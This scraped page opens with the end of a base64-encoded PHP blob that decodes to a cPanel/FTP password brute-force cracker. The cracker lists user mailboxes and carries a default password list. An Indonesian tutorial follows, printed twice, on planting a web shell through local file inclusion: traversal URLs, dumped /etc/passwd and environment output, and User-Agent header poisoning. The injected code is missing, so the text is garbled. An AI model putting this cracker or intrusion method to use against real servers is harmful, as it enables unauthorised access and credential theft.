vcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOw0KY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsNCiRkYXRhID0gY3VybF9leGVjKCRjaCk7DQppZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApIHsgcHJpbnQgIjxiPjxmb250IGZhY2U9XCJWZXJkYW5hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiPg0KPGZvbnQgY29sb3I9XCIjQUEwMDAwXCI+RXJyb3IgOjwvZm9udD4gPGZvbnQgY29sb3I9XCIjMDA4MDAwXCI+Q29ubmVjdGlvbiBUaW1lb3V0DQpQbGVhc2UgQ2hlY2sgVGhlIFRhcmdldCBIb3N0bmFtZSAuPC9mb250PjwvZm9udD48L2I+PC9wPiI7ZXhpdDt9DQplbHNlaWYgKCBjdXJsX2Vycm5vKCRjaCkgPT0gMCApew0KcHJpbnQgIjx0YWJsZSB3aWR0aD0nNjclJyBzdHlsZT0nYm9yZGVyOiAycHggZGFzaGVkICMxRDFEMUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAnPjx0cj48dGQgYWxpZ249Y2VudGVyPjxiPjxmb250IGZhY2U9XCJUYWhvbWFcIiBjb2xvcj1cIiNGRjAwMDBcIj5bK108L2ZvbnQ+PGZvbnQ+DQpDcmFja2luZyBTdWNjZXNzIFdpdGggVXNlcm5hbWUgKDwvZm9udD48Zm9udCBjb2xvcj1cIiNGRjAwMDBcIj4kdXNlcjwvZm9udD48Zm9udD4pIGFuZCBQYXNzd29yZCAoPC9mb250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiRwYXNzPC9mb250Pjxmb250IGNvbG9yPVwiIzAwODAwMFwiPik8L2ZvbnQ+PC9iPjwvdGQ+PC90cj48L3RhYmxlPiI7fWN1cmxfY2xvc2UoJGNoKTt9DQppZihpc3NldCgkc3VibWl0KSAmJiAhZW1wdHkoJHN1Ym1pdCkpew0KaWYoZW1wdHkoJHVzZXJzKSAmJiBlbXB0eSgkcGFzcykpeyBwcmludCAiPHA+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHNpemU9XCIyXCI+PGI+PGZvbnQgY29sb3I9XCIjRkYwMDAwXCI+RXJyb3IgOiA8L2ZvbnQ+UGxlYXNlIENoZWNrIFRoZSBVc2VycyBvciBQYXNzd29yZCBMaXN0IEVudHJ5IC4gLiAuPC9iPjwvZm9udD48L3A+IjsgZXhpdDsgfQ0KaWYoZW1wdHkoJHVzZXJzKSl7IHByaW50ICI8cD48Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzInPjxiPjxmb250IGNvbG9yPScjRkYwMDAwJz5FcnJvciA6IDwvZm9udD5QbGVhc2UgQ2hlY2sgVGhlIFVzZXJzIExpc3QgRW50cnkgLiAuIC48L2I+PC9mb250PjwvcD4iOyBleGl0OyB9DQppZihlbXB0eSgkcGFzcykgKXsgcHJpbnQgIjxwPjxmb250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPkVycm9yIDogPC9mb250PlBsZWFzZSBDaGVjayBUaGUgUGFzc3dvcmQgTGlzdCBFbnRyeSAuIC4gLjwvYj48L2ZvbnQ+PC9wPiI7IGV4aXQ7IH07DQokdXNlcmxpc3Q9ZXhwbG9kZSgiXG4iLCR1c2Vycyk7DQokcGFzc2xpc3Q9ZXhwbG9kZSgiXG4iLCRwYXNzKTsNCnByaW50ICI8Yj48Zm9udCBmYWNlPVwiVGFob21hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiIGNvbG9yPVwiIzAwODAwMFwiPlt+XSM8L2ZvbnQ+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHN0eWxlPVwiZm9udC1zaXplOiA5cHRcIiBjb2xvcj1cIiNGRjAwMDBcIj4NCkNyYWNraW5nIFByb2Nlc3MgU3RhcnRlZCwgUGxlYXNlIFdhaXQgLi4uPC9mb250PjwvYj48YnI+PGJyPiI7DQpmb3JlYWNoICgkdXNlcmxpc3QgYXMgJHVzZXIpIHsNCiRwdXJldXNlciA9IHRyaW0oJHVzZXIpOw0KZm9yZWFjaCAoJHBhc3NsaXN0IGFzICRwYXNzd29yZCApIHsNCiRwdXJlcGFzcyA9IHRyaW0oJHBhc3N3b3JkKTsNCmlmKCRjcmFja3R5cGUgPT0gImZ0cCIpew0KZnRwX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRwdXJlcGFzcywkY29ubmVjdF90aW1lb3V0KTsNCn0NCmlmICgkY3JhY2t0eXBlID09ICJjcGFuZWwiKQ0Kew0KY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRwdXJlcGFzcywkY29ubmVjdF90aW1lb3V0KTsNCn0NCn0NCn0NCn0NCj8+PD8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKCRfUE9TVFsnZW50ZXInXSl7DQplY2hvICI8Zm9ybSBtZXRob2Q9UE9TVCBhY3Rpb249Jyc+PHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkPiA8YnIgLz4NCiAgICAgICAgPHAgYWxpZ249J2NlbnRlcic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPg0KICAgICAgICAgICAgICAgIDxzcGFuIGxhbmc9J2VuLXVzJz5TZXJ2ZXIncyBJUDwvc3Bhbj4gOjwvZm9udD48Zm9udCBmYWNlPSdBcmlhbCc+DQogICAgICAgIDwvZm9udD48Zm9udCBmYWNlPSdBcmlhbCcgY29sb3I9JyNDQzAwMDAnPg0KICAgICAgICA8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndGFyZ2V0JyBzaXplPScxNicgdmFsdWU9JHRhcmdldCBzdHlsZT0nYm9yZGVyOiAycHggZGFzaGVkICMxRDFEMUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAnPjwvZm9udD48L2I+PC9wPg0KICAgICAgICA8cCBhbGlnbj0nY2VudGVyJz48Yj48Zm9udCBjb2xvcj0nIzAwODAwMCcgZmFjZT0nVGFob21hJyBzaXplPScyJz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgPC9mb250PjwvYj48L3A+DQogICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGFsaWduPSdjZW50ZXInPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9JzU1JScgc3R5bGU9J2JvcmRlcjogMnB4IGRhc2hlZCAjMUQxRDFEOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOyBjb2xvcjojQzBDMEMwJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgYWxpZ249J2NlbnRlcic+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBsYW5nPSdlbi11cyc+PGZvbnQgY29sb3I9JyNGRjAwMDAnPjxiPlVzZXJuYW1lPC9iPjwvZm9udD48L3NwYW4+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwIGFsaWduPSdjZW50ZXInPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gbGFuZz0nZW4tdXMnPjxmb250IGNvbG9yPScjRkYwMDAwJz48Yj5QYXNzd29yZDwvYj48L2ZvbnQ+PC9zcGFuPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCg0KICAgICAgICAgICAgICAgICAgICAgICAgPHAgYWxpZ249J2NlbnRlcic+Jm5ic3A7PHRleHRhcmVhIHJvd3M9JzIwJyBuYW1lPSd1c2VycycgY29scz0nMjUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+IjsNCg0KICAgICAgc3lzdGVtKCdscyAvdmFyL21haWwnKTsNCg0KZWNobyAiPC90ZXh0YXJlYT48dGV4dGFyZWEgcm93cz0nMjAnIG5hbWU9J3Bhc3N3b3JkcycgY29scz0nMjUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+MTIzMTIzXG4xMjM0NTZcbjEyMzQ1NjdcbjEyMzQ1Njc4XG4xMjM0NTY3ODlcbjE1OTE1OVxuMTEyMjMzXG4zMzIyMTFcbjE0Nzg5NjNcbjE0Nzg5NjMuXG5jcGFuZWxcbnBhc3N3b3JkXG51c2VyXG5wYXNzd2RcbnBhc3N3b3Jkc1xuMTU5MzU3XG4zNTc5NTFcbjExNDQ3N1xucGFzc1xuUGFzc3dvcmQ8L3RleHRhcmVhPjxicj4NCiAgICAgICAgPGJyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxiPiA8Zm9udCBmb250IGNvbG9yPScjRkYwMDAwJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd1ZXNzIG9wdGlvbnM8L2ZvbnQ+PC9iPjxmb250IHN0eWxlPSdmb250LXNpemU6IDEycHQ7JyBzaXplPSctMycgZmFjZT0nVmVyZGFuYSc+PHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Oyc+Jm5ic3A7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9udCBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9J2NyYWNrdHlwZScgdmFsdWU9J2NwYW5lbCcgc3R5bGU9J2ZvbnQtd2VpZ2h0OiA3MDA7JyBjaGVja2VkIHR5cGU9J3JhZGlvJz48L2ZvbnQ+PC9zcGFuPjwvZm9udD48Yj48Zm9udCBzaXplPScyJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ3BhbmVsPC9mb250Pjxmb250IHNpemU9JzInIGNvbG9yPScjY2MwMDAwJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9mb250Pjxmb250IHNpemU9JzInIGNvbG9yPScjRkZGRkZGJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKDIwODIpPC9mb250PjwvYj48Zm9udCBzaXplPScyJyBmYWNlPSdUYWhvbWEnPjxiPiA8L2I+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9udCBzdHlsZT0nZm9udC1zaXplOiAxMnB0Oycgc2l6ZT0nLTMnIGZhY2U9J1ZlcmRhbmEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Oyc+PGZvbnQgZmFjZT0nVGFob21hJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSdjcmFja3R5cGUnIHZhbHVlPSdmdHAnIHN0eWxlPSdmb250LXdlaWdodDogNzAwOycgdHlwZT0ncmFkaW8nPjwvZm9udD48L3NwYW4+PC9mb250Pjxmb250IHN0eWxlPSdmb250LXdlaWdodDogNzAwOycgc2l6ZT0nMicgZmFjZT0nVGFob21hJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZm9udD48c3BhbiBzdHlsZT0nZm9udC13ZWlnaHQ6IDcwMDsnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZvbnQgc2l6ZT0nMicgZmFjZT0nVGFob21hJz5GdHAgPC9mb250Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZvbnQgc2l6ZT0nMicgY29sb3I9JyNGRkZGRkYnIGZhY2U9J1RhaG9tYSc+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoMjEpPC9mb250Pjwvc3Bhbj48L3A+DQogICAgICAgIDxwIGFsaWduPSdjZW50ZXInPjxvcHRpb24gdmFsdWU9J25hbWUnPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOw0KICAgICAgICA8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nICAgQ3JhY2sgaXQgISAgICcgbmFtZT0nc3VibWl0JyBzdHlsZT0nY29sb3I6ICNGRjAwMDA7IGZvbnQtd2VpZ2h0OiBib2xkOyBib3JkZXI6IDFweCBkYXNoZWQgIzMzMzMzMzsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMCc+PC9wPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KDQogICAgPHAgYWxpZ249J2NlbnRlcic+PC90ZD4NCiAgPC90cj4NCiAgPC9mb3JtPg0KICA8dGFibGUgd2lkdGg9JzY3JScgc3R5bGU9J2JvcmRlcjogMnB4IGRhc2hlZCAjMUQxRDFEOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOyBjb2xvcjojQzBDMEMwJz4NCjx0cj48dGQgYWxpZ249Y2VudGVyPg0KIDxmb250IGZhY2U9J0NvdXJpZXIgTmV3JyBzaXplPTIgY29sb3I9eWVsbG93PltDb2RlZCBCeSBDcmF6eV9IYWNrZXJdPGJyIC8+Q29weXJpZ2h0IHJlc2VydmVkIHRvIDBkYXkuY29tIChTZWN1cml0eSBMb3YzcnopPC9mb250Pg0KPC90ZD48L3RyPg0KPC90YWJsZT4NCiAgIjtkaWUoKTsNCn0NCj8+DQogPHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj48Zm9ybSBtZXRob2Q9UE9TVCBhY3Rpb249JycgYWxpZ249Y2VudGVyPjxiciAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPWVudGVyIHZhbHVlPSIgRW50ZXIgIiBzdHlsZT0nY29sb3I6ICNGRjAwMDA7IGZvbnQtd2VpZ2h0OiBib2xkOyBib3JkZXI6IDFweCBkYXNoZWQgIzMzMzMzMzsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMCcgLz48L2Zvcm0+PC90ZD48L3RyPjwvdGFibGU+PGJyIC8+DQoNCg0KPHRhYmxlIHdpZHRoPSI2NyUiIHN0eWxlPSJib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj4NCiA8Zm9udCBmYWNlPSJDb3VyaWVyIE5ldyIgc2l6ZT0yIGNvbG9yPXllbGxvdz5bQ29kZWQgQnkgQ3JhenlfSGFja2VyXTxiciAvPkNvcHlyaWdodCByZXNlcnZlZCB0byAwZGF5LmNvbSAoU2VjdXJpdHkgTG92M3J6KTwvZm9udD4NCjwvdGQ+PC90cj4NCjwvdGFibGU+'));
?>
Cara menanam shell lewat LFI (Local file disclosure) dengan metode proc/self/environ
dengan tutorial ini saya akan menjelaskan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.
Ok kita langsung saja…
1. kita menemukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?file=..%2F..%2F..%2F
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc%2Fpasswd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron”
lalu pada user-agent isikan dengan kode berikut :
view source
print?
1
atau
view source
print?
1
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
www.http://site.com/shell.php
happy hacking !
dengan tutorial ini saya akan menjelaskan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.
Ok kita langsung saja…
1. kita menemukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?file=..%2F..%2F..%2F
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc%2Fpasswd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron”
lalu pada user-agent isikan dengan kode berikut :
view source
print?
1
atau
view source
print?
1
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
www.http://site.com/shell.php
happy hacking !
